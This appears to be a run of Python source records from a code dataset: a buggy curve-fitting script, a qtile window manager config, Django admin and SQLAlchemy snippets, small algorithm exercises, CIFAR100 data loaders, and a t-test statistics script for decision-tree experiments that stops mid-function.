= 0. \nsin3[:,75:] = 0. \nsin4[:,:75] = 0. \n\nmask1 = np.zeros((50,100))\nmask2 = np.zeros((50,100))\nmask3 = np.zeros((50,100))\nmask4 = np.zeros((50,100))\nfor i in range(50):\n for j in range(100):\n \n if sin1[i,j] != 0:\n mask1[i,j] = 1.\n if sin2[i,j] != 0.:\n mask2[i,j] = 1.\n if sin3[i,j] != 0.:\n mask3[i,j] = 1.\n if sin4[i,j] != 0.:\n mask4[i,j] = 1.\n\nlayer_map = np.array([sin1,sin2,sin3,sin4])\n\n\n#Formula to modify to change curve\ncomparison = np.ones((50,100))\nindex_matrix = np.zeros((50,100,2))\n\nfor i in range(50):\n for j in range(100):\n index_matrix[i,j,0] = i\n index_matrix[i,j,1] = j\n\na0_init, a1_init, a2_init, a3_init = 1.0, 1.0, 1.0, 1.0\ndef Correction(theta):\n\n global diff_1, diff_1, diff_3, diff_4\n global model, correction_model\n a0, a1, a2, a3 = theta\n correction1 = np.zeros((50,100))\n correction2 = np.zeros((50,100))\n correction3 = np.zeros((50,100))\n correction4 = np.zeros((50,100))\n for i in range(50):\n for j in range(100):\n # Corrections not based on map-generating formula\n #\n\n correction1_p1[i,j] = np.cos((i - 25.)*np.pi/50.)\n correction_p2[i,j] = (1 - ((j - (12.5 + 50))*(np.pi/25.))**2/2 + ((j - (12.5 + 50.)*np.pi/25.)**4./24. - ((j - (12.5 + 50.))*np.pi/25.)**6./720.))\n \n\n correction1[i,j] = 1./(np.cos((i - 25.)*np.pi/50.) * (1 - ((j - 12.5)*(np.pi/25.))**2/2.))\n correction2[i,j] = 1./(np.cos((i - 25.)*np.pi/50.) * (1 - ((j - (12.5 + 25.))*(np.pi*a1/25.)**2/2.)))\n correction3[i,j] = 1./(np.cos((i - 25.)*np.pi/50.) * (1 - ((j - (12.5 + 50.))*(np.pi*a2/25.)**2/2.)))\n correction4[i,j] = 1./(np.cos((i - 25.)*np.pi/50.) * (1 - ((j - (12.5 + 75.))*(np.pi*a3/25.)**2/2.)))\n\n correction_model = np.array([correction1, correction2, correction3, correction4])\n model = np.maximum((layer_map * correction_model)[0], (layer_map * correction_model)[1])\n \n Image1 = mask1 * model\n Image2 = mask2 * model\n Image3 = mask3 * model\n Image4 = mask4 * model\n \n # Returns the sum of the first and second models, which is sin1, sin2 getting multiplied by the respective correction for each\n # Why am I returning the sum of the absolute difference of the model and the comparison. The comparison is a matrix of ones. But It would need to be a two layered martix, not just one.\n return np.sum((np.abs(Image1 - sin1) + np.abs(Image2 - sin2) + np.abs(Image3 - sin3) + np.abs(Image4 - sin4))**2)\n diff_1, diff_2, diff_3, diff_4 = np.abs(Image1 - sin1), np.abs(Image2 - sin2), np.abs(Image3 - sin3), np.abs(Image4 - sin4)\n \n #return np.sum(np.abs(model - comparison))\n\nimport scipy.optimize as op\nresult = op.minimize(Correction, [a0_init, a1_init, a2_init, a3_init], options = {'maxiter' : 1000}, args=(), method='COBYLA')\nprint(result)\n\nImage1 = mask1 * model\nImage2 = mask2 * model\nImage3 = mask3 * model\nImage4 = mask4 * model\n\ndiff_1, diff_2, diff_3, diff_4 = np.sum(np.abs(Image1 - sin1)), np.sum(np.abs(Image2 - sin2)), np.sum(np.abs(Image3 - sin3)), np.sum(np.abs(Image4 - sin4))\n\n \na0, a1, a2, a3 = result[\"x\"][0], result[\"x\"][1], result[\"x\"][2], result[\"x\"][3]\n\nlevels = []\nfor i in range(100):\n levels.append(0.03*i)\n\nx = list(range(100))\ny = list(range(50))\n\ncorrection1 = 1./(np.cos((index_matrix[:,:,0] - 25.)*np.pi/50.) * (1 - ((index_matrix[:,:,1] - 12.5)/(2*np.pi*a0/100))**2/2.))\ncorrection2 = 1./(np.cos((index_matrix[:,:,0] - 25.)*np.pi/50.) * (1 - ((index_matrix[:,:,1] - (12.5 + 25.))/(2*np.pi*a1/100))**2/2.))\ncorrection3 = 1./(np.cos((index_matrix[:,:,0] - 25.)*np.pi/50.) * (1 - ((index_matrix[:,:,1] - (12.5 + 50.))/(2*np.pi*a2/100))**2/2.))\ncorrection4 = 1./(np.cos((index_matrix[:,:,0] - 25.)*np.pi/50.) * (1 - ((index_matrix[:,:,1] - (12.5 + 75.))/(2*np.pi*a3/100))**2/2.))\n\ncorrection_model = np.array([correction1, correction2, correction3, correction4])\n\nplt.ion()\nplt.figure()\ncp = plt.contourf(x, y, Image1, cmap='hot', levels=levels)\nplt.show()\n\nImage1 = mask1 * model\nImage2 = mask2 * model\nImage3 = mask3 * model\nImage4 = mask4 * model\n\n#correction_model = np.array([correction1, correction2, correction3, correction4])\n#model = np.max(layer_model * correction_model, axis=0)\n\n\n\n\n\"\"\"\nimport difflib\n\nlines1 = []\nlines2 = []\n\nwith open('6:29.py', 'r') as f:\n\tfor line in f:\n\t\tlines1.append(line)\n\nwith open('6:24.py', 'r') as f:\n\tfor line in f:\n\t\tlines2.append(line)\n\nd = difflib.Differ()\ndiff = d.compare(lines1, lines2)\nprint '\\n'.join(diff)\n\n\nc0, c1, c2, c3 = theta\ncorrection = np.array(c0 - c1*(1 - mu_master) - c2*(1 - mu_master**2) - c3*(1 - mu_master**3))\n\nmodel = map_brightest * correction\nLight_Curve_Images = np.zeros((5,360,7100))\nLight_Curve_Values = np.zeros((5))\nfor i in range(5):\n\n Light_Curve_Images[i] = model * mu_mask_master[i]/(c0 - c1*(1 - mu_mask_master[i]) - c2*(1 - mu_mask_master[i]**2) - c3*(1 - mu_mask_master[i]**3))\n Light_Curve_Images[i] *= Cylindrical_to_Spherical_Conversion_list[i]\n Light_Curve_Values[i] = np.sum(Light_Curve_Images[i])\n\n\nMap_Totals = np.sum(np.sum(Map_Master_Spherical, axis=2), axis=1)\nMap_Totals *= np.sum(Light_Curve_Values)/np.sum(Map_Totals)\nLight_Curve_Diff = (Light_Curve_Values - Map_Totals)/np.sum(Light_Curve_Values)\nChi_Value = np.sum(Light_Curve_Diff**2)\"\"\"","sub_path":"7:7/7:10_3.py","file_name":"7:10_3.py","file_ext":"py","file_size_in_byte":5983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"247778738","text":"# Copyright (c) 2010 Aldo Cortesi\n# Copyright (c) 2010, 2014 dequis\n# Copyright (c) 2012 Randall Ma\n# Copyright (c) 2012-2014 Tycho Andersen\n# Copyright (c) 2012 Craig Barnes\n# Copyright (c) 2013 horsik\n# Copyright (c) 2013 Tao Sauvage\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\nfrom typing import List # noqa: F401\n\nfrom libqtile import bar, layout, widget, hook\nfrom libqtile.config import Click, Drag, Group, Key, Match, Screen\nfrom libqtile.lazy import lazy\nfrom libqtile.utils import guess_terminal\nimport os \nimport subprocess\n\ndef go_to_group(group):\n def f(qtile):\n if group in '12345':\n qtile.cmd_to_screen(0)\n qtile.groupMap[group].cmd_toscreen()\n else:\n qtile.cmd_to_screen(1)\n qtile.groupMap[group].cmd_toscreen()\n return f\n\n\nmod = \"mod4\"\nterminal = guess_terminal()\n\nkeys = [\n # Switch between windows\n Key([mod], \"h\", lazy.layout.left(), desc=\"Move focus to left\"),\n Key([mod], \"l\", lazy.layout.right(), desc=\"Move focus to right\"),\n Key([mod], \"j\", lazy.layout.down(), desc=\"Move focus down\"),\n Key([mod], \"k\", lazy.layout.up(), desc=\"Move focus up\"),\n Key([mod], \"space\", lazy.next_screen(), desc=\"Switch monitor keeb focus\"),\n\n # Move windows between left/right columns or move up/down in current stack.\n # Moving out of range in Columns layout will create new column.\n Key([mod, \"shift\"], \"h\", lazy.layout.shuffle_left(),\n desc=\"Move window to the left\"),\n Key([mod, \"shift\"], \"l\", lazy.layout.shuffle_right(),\n desc=\"Move window to the right\"),\n Key([mod, \"shift\"], \"j\", lazy.layout.shuffle_down(),\n desc=\"Move window down\"),\n Key([mod, \"shift\"], \"k\", lazy.layout.shuffle_up(), desc=\"Move window up\"),\n\n # Grow windows. If current window is on the edge of screen and direction\n # will be to screen edge - window would shrink.\n Key([mod, \"control\"], \"h\", lazy.layout.grow_left(),\n desc=\"Grow window to the left\"),\n Key([mod, \"control\"], \"l\", lazy.layout.grow_right(),\n desc=\"Grow window to the right\"),\n Key([mod, \"control\"], \"j\", lazy.layout.grow_down(),\n desc=\"Grow window down\"),\n Key([mod, \"control\"], \"k\", lazy.layout.grow_up(), desc=\"Grow window up\"),\n Key([mod], \"n\", lazy.layout.normalize(), desc=\"Reset all window sizes\"),\n Key([mod, \"shift\"], \"f\", lazy.window.toggle_fullscreen(), desc=\"Toggle fullscreen\"),\n\n # Toggle between split and unsplit sides of stack.\n # Split = all windows displayed\n # Unsplit = 1 window displayed, like Max layout, but still with\n # multiple stack panes\n Key([mod, \"shift\"], \"Return\", lazy.layout.toggle_split(),\n desc=\"Toggle between split and unsplit sides of stack\"),\n Key([mod], \"Return\", lazy.spawn(terminal), desc=\"Launch terminal\"),\n\n # Toggle between different layouts as defined below\n Key([mod], \"Tab\", lazy.next_layout(), desc=\"Toggle between layouts\"),\n Key([mod], \"w\", lazy.window.kill(), desc=\"Kill focused window\"),\n\n Key([mod, \"control\"], \"r\", lazy.restart(), desc=\"Restart Qtile\"),\n Key([mod, \"control\"], \"q\", lazy.shutdown(), desc=\"Shutdown Qtile\"),\n Key([mod], \"r\", lazy.spawncmd(),\n desc=\"Spawn a command using a prompt widget\"),\n\n\n # Opening programs:\n\n Key([mod], \"y\", lazy.spawn(\"dmenu_run -p 'Run: '\"),\n desc=\"Run launcher\"),\n \n Key([mod], \"e\", lazy.spawn(\"emacsclient -c -a 'emacs'\"),\n desc=\"Launch emacs\"),\n\n # Controlling volume:\n\n Key([\"shift\"], \"F1\", lazy.spawn('playerctl play-pause')),\n Key([\"shift\"], \"F2\", lazy.spawn('pamixer -d 2')),\n Key([\"shift\"], \"F3\", lazy.spawn('pamixer -i 2'))\n\n]\n\ngroups = [Group(i) for i in \"1234567890\"]\nfor i in groups:\n keys.extend([\n # mod1 + letter of group = switch to group\n Key([mod], i.name, lazy.group[i.name].toscreen(),\n desc=\"Switch to group {}\".format(i.name)),\n\n # mod1 + shift + letter of group = switch to & move focused window to group\n Key([mod, \"shift\"], i.name, lazy.window.togroup(i.name, switch_group=True),\n desc=\"Switch to & move focused window to group {}\".format(i.name)),\n # Or, use below if you prefer not to switch to that group.\n # # mod1 + shift + letter of group = move focused window to group\n # Key([mod, \"shift\"], i.name, lazy.window.togroup(i.name),\n # desc=\"move focused window to group {}\".format(i.name)),\n ])\n\nlayout_theme = {\"border_width\": 2,\n \"margin\": 6,\n \"border_focus\": \"#cc74cc\",\n \"border_normal\": \"#6c6c6c\"\n }\n\n\nlayouts = [\n layout.Columns(**layout_theme),\n layout.Max(**layout_theme),\n # Try more layouts by unleashing below layouts.\n # layout.Stack(num_stacks=2),\n layout.Bsp(**layout_theme),\n # layout.Matrix(),\n layout.MonadTall(**layout_theme),\n # layout.MonadWide(),\n # layout.RatioTile(),\n # layout.Tile(),\n # layout.TreeTab(),\n # layout.VerticalTile(),\n # layout.Zoomy(),\n]\n\ncolours = [[\"#2d2d2d\", \"#2d2d2d\"], #Panel background colour\n [\"#747369\", \"#747369\"], #Background for current screen tab\n [\"#d3d0c8\", \"#d3d0c8\"], #Font colour for group names\n [\"#52cdcd\", \"#52cdcd\"], #Border line colour for current tab\n [\"#5ece5e\", \"#5ece5e\"], #Border line colour for other tab + odd widgets\n [\"#cc74cc\", \"#cc74cc\"], #Colour for even widgets\n [\"#fec148\", \"#fec148\"], #Colour for window name\n [\"#d3d0c8\", \"#d3d0c8\"], #Light text colour for panel\n [\"#cc74cc\", \"#cc74cc\"], #Window border colour \n [\"#5ece5e\", \"#5ece5e\"]] #Green\n\nbright_colours = {'green': colours[9],\n 'pink': colours[8],\n 'yellow': colours[6],\n 'blue': colours[1],\n 'cyan': colours[2],\n 'red': ['#f55a5e', '#f55a5e']}\n\n\n\n\n\nwidget_defaults = dict(\n font='hack',\n fontsize=13,\n padding=2,\n background=colours[0]\n)\nextension_defaults = widget_defaults.copy()\n\nscreens = [\n Screen(wallpaper='~/pictures/w95.jpg', wallpaper_mode='fit',\n top=bar.Bar(\n [\n widget.GroupBox(active=colours[3], highlight_method='block'\n ),\n #widget.Prompt(),\n widget.Spacer(),\n widget.WindowName(foreground=colours[6], fontsize=16),\n widget.Clock(format='%a %d/%m, %I:%M %p', foreground=bright_colours['pink']),\n widget.Spacer(),\n widget.CurrentLayoutIcon()\n ],\n 24,\n ),\n ),\n\n Screen(wallpaper='~/pictures/w95.jpg', wallpaper_mode='fit',\n top=bar.Bar(\n [\n widget.GroupBox(active=colours[3], highlight_method='block'\n ),\n widget.CurrentLayoutIcon(foreground=bright_colours['pink']),\n #widget.Prompt(),\n widget.Spacer(),\n widget.WindowName(foreground=colours[6], fontsize=16),\n widget.Spacer(),\n widget.Clock(format='%d/%m/%Y %a %I:%M %p', foreground=colours[9]),\n widget.Spacer(),\n widget.CheckUpdates(distro=\"Arch_yay\", colour_have_updates=colours[8],\n colour_no_updates=colours[7], no_update_string=\"no updates\"),\n widget.QuickExit()\n ],\n 24,\n ),\n ),\n\n ]\n\n# Drag floating layouts.\nmouse = [\n Drag([mod], \"Button1\", lazy.window.set_position_floating(),\n start=lazy.window.get_position()),\n Drag([mod], \"Button3\", lazy.window.set_size_floating(),\n start=lazy.window.get_size()),\n Click([mod], \"Button2\", lazy.window.bring_to_front())\n]\n\ndgroups_key_binder = None\ndgroups_app_rules = [] # type: List\nmain = None # WARNING: this is deprecated and will be removed soon\nfollow_mouse_focus = True\nbring_front_click = False\ncursor_warp = False\nfloating_layout = layout.Floating(float_rules=[\n # Run the utility of `xprop` to see the wm class and name of an X client.\n *layout.Floating.default_float_rules,\n Match(wm_class='confirmreset'), # gitk\n Match(wm_class='makebranch'), # gitk\n Match(wm_class='maketag'), # gitk\n Match(wm_class='ssh-askpass'), # ssh-askpass\n Match(title='branchdialog'), # gitk\n Match(title='pinentry'), # GPG key password entry\n])\nauto_fullscreen = True\nfocus_on_window_activation = \"smart\"\n\n@hook.subscribe.startup_once\ndef start_once():\n home = os.path.expanduser('~')\n subprocess.run([home + '/.config/qtile/autostart.sh'])\n\n# XXX: Gasp! We're lying here. In fact, nobody really uses or cares about this\n# string besides java UI toolkits; you can see several discussions on the\n# mailing lists, GitHub issues, and other WM documentation that suggest setting\n# this string if your java app doesn't work correctly. We may as well just lie\n# and say that we're a working one by default.\n#\n# We choose LG3D to maximize irony: it is a 3D non-reparenting WM written in\n# java that happens to be on java's whitelist.\nwmname = \"LG3D\"\n","sub_path":"qtile/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":10035,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"429797096","text":"from django.contrib import admin\nfrom .models import NewsletterSubscriber, Message\n\n\nclass NewsletterSubscriberAdmin(admin.ModelAdmin):\n model = NewsletterSubscriber\n list_display = (\n \"email\",\n )\n\n\nclass MessageAdmin(admin.ModelAdmin):\n model = Message\n readonly_fields = (\n \"subject\",\n \"user_email\",\n \"message\",\n )\n\n\nadmin.site.register(NewsletterSubscriber,\n NewsletterSubscriberAdmin)\nadmin.site.register(Message, MessageAdmin)\n","sub_path":"homepage/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"368262405","text":"import sys\n\nq = lambda: sys.stdin.readline().strip()\nn = int(q())\nstack = []\n\nfor _ in range(n):\n\ttemp = q()\n\tif temp[:4]=='push':\n\t\tstack.append(int(temp[4:]))\n\t\n\telif temp=='pop':\n\t\tif len(stack)>0: print(stack.pop())\n\t\telse: print(-1)\n\t\n\telif temp=='top':\n\t\tif len(stack)>0: print(stack[-1])\n\t\telse: print(-1)\n\t\n\telif temp=='empty':\n\t\tif len(stack)==0: print(1)\n\t\telse: print(0)\n\t\n\telif temp=='size':\n\t\tprint(len(stack))\n","sub_path":"week-study/10828.py","file_name":"10828.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"394271778","text":"while True:\r\n try:\r\n cube = int(input(\"Enter an integer: \"))\r\n guess = 0\r\n\r\n while guess ** 3 < abs(cube):\r\n guess += 1\r\n if guess ** 3 != abs(cube):\r\n print(cube, \"is not a perfect cube\")\r\n break\r\n else:\r\n if cube < 0:\r\n guess = -guess\r\n print(\"Cube root of\", cube, \"is:\", guess)\r\n break \r\n except ValueError:\r\n print(\"You have not entered an integer\")\r\n","sub_path":"basic_algorithms/guess_and_check_cube_root.py","file_name":"guess_and_check_cube_root.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"234278100","text":"from torch.utils import data\nimport torchvision.transforms as transforms\nimport os\nimport torchvision\n\nimport glob\n\nCIFAR100_TRAIN_MEAN = [0.5070751592371323, 0.48654887331495095, 0.4409178433670343]\nCIFAR100_TRAIN_STD = [0.2673342858792401, 0.2564384629170883, 0.27615047132568404]\n\nCIFAR100_TEST_MEAN = [0.5088964127604166, 0.48739301317401956, 0.44194221124387256]\nCIFAR100_TEST_STD = [0.2682515741720801, 0.2573637364478126, 0.2770957707973042]\n\ndef get_train_loader(args, dataset_class, use_sobel=False, use_color=False):\n # Data loading code\n normalize = transforms.Normalize(mean=CIFAR100_TRAIN_MEAN,\n std=CIFAR100_TRAIN_STD)\n img_transform = transforms.Compose([\n transforms.RandomCrop(32, padding=4),\n transforms.RandomHorizontalFlip(),\n transforms.RandomRotation(15),\n transforms.ToTensor(),\n normalize,\n ])\n\n dataset = dataset_class(f'{args.img_dir}/train', transform=img_transform, use_sobel=use_sobel, use_color=use_color)\n # dataset = torchvision.datasets.CIFAR100(root='/home/work/Datasets/CIFAR100', train=True, download=True, transform=img_transform)\n\n train_dataloader = data.DataLoader(dataset, num_workers=args.n_workers, batch_size=args.batch_size, shuffle=True,\n drop_last=True)\n\n return train_dataloader\n\ndef get_val_loader(args, dataset_class):\n # Data loading code\n normalize = transforms.Normalize(mean=CIFAR100_TRAIN_MEAN,\n std=CIFAR100_TRAIN_STD)\n img_transform = transforms.Compose([\n transforms.ToTensor(),\n normalize,\n ])\n\n dataset = dataset_class(f'{args.img_dir}/test', transform=img_transform)\n # dataset = torchvision.datasets.CIFAR100(root='/home/work/Datasets/CIFAR100', train=False, download=True, transform=img_transform)\n\n train_dataloader = data.DataLoader(dataset, num_workers=args.n_workers, batch_size=args.batch_size, shuffle=True,\n drop_last=True)\n\n return train_dataloader\n\n","sub_path":"CIFAR100/data/data_manager.py","file_name":"data_manager.py","file_ext":"py","file_size_in_byte":2066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"230399549","text":"from sqlalchemy import Table, Column, MetaData, String\nfrom sqlalchemy import create_engine\n\nmeta = MetaData()\n\nengine = create_engine('mysql://root:rachel@localhost/test?charset=utf8')\n\nmeta.bind = engine\n\nusers = Table('users', meta, autoload=True)\nphone = Column('phone', String(50))\n\n# I think this method is wrapped by sqlalchemy-migrate\nusers.create_column(phone)\n","sub_path":"sqlalchemy/add_column.py","file_name":"add_column.py","file_ext":"py","file_size_in_byte":371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"8338305","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\n'''Module used to calculate t-student statistics of experiments.\n'''\n\nimport collections\nimport itertools\nimport json\nimport math\nimport os\nimport statistics\nimport sys\n\nfrom scipy.stats import t as student_t\n\n\nColumnIndices = collections.namedtuple('ColumnIndices',\n ['dataset_col',\n 'attribute_col',\n 'num_values_col',\n 'criterion_col',\n 'trial_number_col',\n 'fold_number_col',\n 'accuracy_w_missing_col',\n 'accuracy_wo_missing_col',\n 'num_nodes_col'])\n\n#: Contain the column indices for a rank experiment\nRANK_COLUMN_INDICES = ColumnIndices(dataset_col=1,\n attribute_col=3,\n num_values_col=5,\n criterion_col=8,\n trial_number_col=7,\n fold_number_col=11,\n accuracy_w_missing_col=29,\n accuracy_wo_missing_col=30,\n num_nodes_col=33)\n\n#: Contain the column indices for a cross-validation experiment\nCROSS_VALIDATION_COLUMN_INDICES = ColumnIndices(dataset_col=1,\n attribute_col=None,\n num_values_col=None,\n criterion_col=4,\n trial_number_col=3,\n fold_number_col=None,\n accuracy_w_missing_col=20,\n accuracy_wo_missing_col=21,\n num_nodes_col=28)\n\n#: Contain the column indices for a train-and-test experiment\nTRAIN_AND_TEST_COLUMN_INDICES = ColumnIndices(dataset_col=1,\n attribute_col=None,\n num_values_col=None,\n criterion_col=7,\n trial_number_col=5,\n fold_number_col=None,\n accuracy_w_missing_col=20,\n accuracy_wo_missing_col=21,\n num_nodes_col=24)\n\n\ndef main(output_path):\n '''Calculates the t-student statistics of experiments contained in this folder.\n\n The `output_path` folder must contain the `raw_output.csv` file and the `experiment_config.json`\n file, otherwise the function will exit.\n '''\n raw_output_path = os.path.join(output_path, 'raw_output.csv')\n if (not os.path.exists(raw_output_path)\n or not os.path.isfile(raw_output_path)):\n print('This path does not contain the output of an experiment.')\n sys.exit(1)\n\n experiment_config_filepath = os.path.join(output_path, 'experiment_config.json')\n if (not os.path.exists(experiment_config_filepath)\n or not os.path.isfile(experiment_config_filepath)):\n print('This path does not contain the output of an experiment.')\n sys.exit(1)\n with open(experiment_config_filepath, 'r') as experiment_config_json:\n experiment_config = json.load(experiment_config_json)\n if \"min num values to compare\" in experiment_config:\n min_num_values_to_compare = experiment_config[\"min num values to compare\"]\n else:\n min_num_values_to_compare = 2\n\n if experiment_config[\"rank attributes\"]:\n is_rank = True\n column_indices = RANK_COLUMN_INDICES\n elif experiment_config[\"use cross-validation\"]:\n is_rank = False\n column_indices = CROSS_VALIDATION_COLUMN_INDICES\n else:\n is_rank = False\n column_indices = TRAIN_AND_TEST_COLUMN_INDICES\n\n single_sided_p_value_threshold = experiment_config[\"t-test single-sided p-value\"]\n\n raw_data = _load_raw_data(raw_output_path, column_indices, is_rank, min_num_values_to_compare)\n _save_raw_stats(raw_data, output_path, is_rank)\n _save_aggreg_stats(output_path, single_sided_p_value_threshold)\n\n\ndef _load_raw_data(raw_output_path, column_indices, is_rank, min_num_values_to_compare=2):\n def _init_raw_data():\n # This function creates (in a lazy way) an infinitely-nested default dict. This is\n # useful when creating a default dict highly nested.\n return collections.defaultdict(_init_raw_data)\n\n raw_data = _init_raw_data()\n has_read_header = False\n with open(raw_output_path, 'r') as fin:\n for line in fin:\n if not has_read_header:\n has_read_header = True\n continue\n line_list = line.split(',')\n\n dataset_name = line_list[column_indices.dataset_col]\n criterion_name = line_list[column_indices.criterion_col]\n trial_number = line_list[column_indices.trial_number_col]\n\n accuracy_w_missing = float(line_list[column_indices.accuracy_w_missing_col])\n try:\n accuracy_wo_missing = float(line_list[column_indices.accuracy_wo_missing_col])\n except ValueError:\n accuracy_wo_missing = None\n num_nodes = float(line_list[column_indices.num_nodes_col])\n\n if is_rank:\n try:\n num_values = int(line_list[column_indices.num_values_col])\n if num_values < min_num_values_to_compare:\n continue\n except ValueError:\n # Numeric attribute\n if min_num_values_to_compare > 2:\n # In this case we assume we are only interested in nominal attributes.\n continue\n attribute_name = line_list[column_indices.attribute_col]\n fold_number = line_list[column_indices.fold_number_col]\n raw_data[dataset_name][attribute_name][criterion_name][trial_number][\n fold_number] = (accuracy_w_missing,\n accuracy_wo_missing,\n num_nodes)\n else:\n raw_data[dataset_name][criterion_name][trial_number] = (accuracy_w_missing,\n accuracy_wo_missing,\n num_nodes)\n return raw_data\n\n\ndef _save_raw_stats(raw_data, output_path, is_rank):\n raw_stats_output_file = os.path.join(output_path, 'raw_t_student_stats.csv')\n with open(raw_stats_output_file, 'w') as fout:\n header = ['Dataset',\n 'Attribute',\n 'Criterion Difference Name',\n 'Paired t-statistics on Accuracy with Missing Values',\n 'Degrees of Freedom of Accuracy with Missing Values',\n 'P-value t-statistics on Accuracy with Missing Values',\n 'Paired t-statistics on Accuracy without Missing Values',\n 'Degrees of Freedom of Accuracy without Missing Values',\n 'P-value t-statistics on Accuracy without Missing Values',\n 'Paired t-statistics on Number of Nodes',\n 'Degrees of Freedom of Number of Nodes',\n 'P-value t-statistics on Number of Nodes']\n print(','.join(header), file=fout)\n if is_rank:\n for dataset_name in raw_data:\n for attribute_name in raw_data[dataset_name]:\n for (criterion_name_1,\n criterion_name_2) in itertools.combinations(\n raw_data[dataset_name][attribute_name], 2):\n\n\n criterion_diff_name = ' - '.join((criterion_name_1, criterion_name_2))\n accuracy_w_missing_diff = []\n accuracy_wo_missing_diff = []\n num_nodes_diff = []\n\n trial_number_intersection = (\n set(raw_data[dataset_name][attribute_name][criterion_name_1].keys())\n & set(raw_data[dataset_name][attribute_name][criterion_name_2].keys()))\n for trial_number in trial_number_intersection:\n fold_number_intersection = (\n set(raw_data[dataset_name][attribute_name][criterion_name_1][\n trial_number].keys())\n & set(raw_data[dataset_name][attribute_name][criterion_name_2][\n trial_number].keys()))\n for fold_number in fold_number_intersection:\n criterion_1_data = raw_data[dataset_name][attribute_name][\n criterion_name_1][trial_number][fold_number]\n criterion_2_data = raw_data[dataset_name][attribute_name][\n criterion_name_2][trial_number][fold_number]\n\n accuracy_w_missing_diff.append(\n criterion_1_data[0] - criterion_2_data[0])\n if (criterion_1_data[1] is not None\n and criterion_2_data[1] is not None):\n accuracy_wo_missing_diff.append(\n criterion_1_data[1] - criterion_2_data[1])\n num_nodes_diff.append(\n criterion_1_data[2] - criterion_2_data[2])\n\n (t_statistic_w_missing,\n p_value_w_missing) = _calculate_t_statistic(accuracy_w_missing_diff)\n (t_statistic_wo_missing,\n p_value_wo_missing) = _calculate_t_statistic(accuracy_wo_missing_diff)\n (t_statistic_num_nodes,\n p_value_num_nodes) = _calculate_t_statistic(num_nodes_diff)\n print(','.join([dataset_name,\n attribute_name,\n criterion_diff_name,\n str(t_statistic_w_missing),\n str(len(accuracy_w_missing_diff) - 1),\n str(p_value_w_missing),\n str(t_statistic_wo_missing),\n str(len(accuracy_wo_missing_diff) - 1),\n str(p_value_wo_missing),\n str(t_statistic_num_nodes),\n str(len(num_nodes_diff) - 1),\n str(p_value_num_nodes)]),\n file=fout)\n else:\n for dataset_name in raw_data:\n for (criterion_name_1,\n criterion_name_2) in itertools.combinations(raw_data[dataset_name], 2):\n\n criterion_diff_name = ' - '.join((criterion_name_1, criterion_name_2))\n accuracy_w_missing_diff = []\n accuracy_wo_missing_diff = []\n num_nodes_diff = []\n\n trial_number_intersection = (\n set(raw_data[dataset_name][criterion_name_1].keys())\n & set(raw_data[dataset_name][criterion_name_2].keys()))\n for trial_number in trial_number_intersection:\n criterion_1_data = raw_data[dataset_name][criterion_name_1][trial_number]\n criterion_2_data = raw_data[dataset_name][criterion_name_2][trial_number]\n\n accuracy_w_missing_diff.append(\n criterion_1_data[0] - criterion_2_data[0])\n if (criterion_1_data[1] is not None\n and criterion_2_data[1] is not None):\n accuracy_wo_missing_diff.append(\n criterion_1_data[1] - criterion_2_data[1])\n num_nodes_diff.append(\n criterion_1_data[2] - criterion_2_data[2])\n\n (t_statistic_w_missing,\n p_value_w_missing) = _calculate_t_statistic(accuracy_w_missing_diff)\n (t_statistic_wo_missing,\n p_value_wo_missing) = _calculate_t_statistic(accuracy_wo_missing_diff)\n (t_statistic_num_nodes,\n p_value_num_nodes) = _calculate_t_statistic(num_nodes_diff)\n print(','.join([dataset_name,\n str(None),\n criterion_diff_name,\n str(t_statistic_w_missing),\n str(len(accuracy_w_missing_diff) - 1),\n str(p_value_w_missing),\n str(t_statistic_wo_missing),\n str(len(accuracy_wo_missing_diff) - 1),\n str(p_value_wo_missing),\n str(t_statistic_num_nodes),\n str(len(num_nodes_diff) - 1),\n str(p_value_num_nodes)]),\n file=fout)\n\n\ndef _calculate_t_statistic(samples_list):\n if len(samples_list) <= 1:\n return None, None\n mean = statistics.mean(samples_list)\n variance = statistics.variance(samples_list)\n if variance == 0.0:\n # Every sample has the same value.\n if mean == 0.0:\n return 0.0, 0.5\n elif mean > 0.0:\n return float('+inf'), 0.0\n else:\n return float('-inf'), 1.0\n\n num_samples = len(samples_list)\n t_statistic = mean / math.sqrt(variance / num_samples)\n degrees_of_freedom = num_samples - 1\n p_value = 1. - student_t.cdf(t_statistic, degrees_of_freedom)\n return t_statistic, p_value\n\n\ndef _save_aggreg_stats(output_path, single_sided_p_value_threshold):\n # aggreg_data[(dataset, attribute, criterion)] = [num_times_stat_better_w_missing,\n # num_times_stat_better_wo_missing,\n # num_times_stat_larger_num_nodes]\n 